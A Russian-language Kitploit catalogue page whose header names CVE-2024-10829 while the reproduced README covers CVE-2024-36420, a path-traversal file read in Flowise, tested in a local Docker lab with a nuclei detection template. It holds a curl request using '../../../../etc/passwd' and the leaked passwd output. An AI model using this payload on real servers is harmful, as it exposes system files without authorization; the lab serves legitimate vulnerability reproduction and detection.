Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC_CVE-2024-10829 — Анализ CVE-2024-10829 | Kitploit
Инструменты/GitHubGitHub/junn34/poc_cve-2024-10829
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjunn34/poc_cve-2024-10829

POC_CVE-2024-10829

Анализ CVE-2024-10829

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC_CVE-2024-36420

Локальная лаборатория для воспроизведения и черновик шаблона nuclei для CVE-2024-36420, затрагивающего Flowise.

Сводка

CVE-2024-36420 — это произвольное чтение файлов в Flowise, вызванное несанитизированным использованием параметра тела fileName в:

  • POST /api/v1/openai-assistants-file

Эта лаборатория использовалась для проверки:

  • уязвимого поведения на flowiseai/flowise:1.4.3
  • заблокированного поведения на более новой flowiseai/flowise:3.1.2

Ссылки

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

Файлы

Скачать инструмент
  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Уязвимый тест

Запустите Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Проверка вручную:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Ответ уязвимой версии:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Контроль новой версии

Запустите более новую Flowise 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Проверка вручную:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Ответ новой версии:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Проверка шаблона:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Запуск против уязвимой цели:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Ожидаемое поведение:

  • 1.4.3: срабатывание
  • 3.1.2: отсутствие срабатывания

Примечания

  • Разрыв в версиях приемлем, так как этот репозиторий только констатирует наблюдаемое поведение:
    • уязвимость на 1.4.3
    • блокировка на 3.1.2
  • Он не утверждает точную границу версии с исправлением.
  • Цели из реального мира не использовались.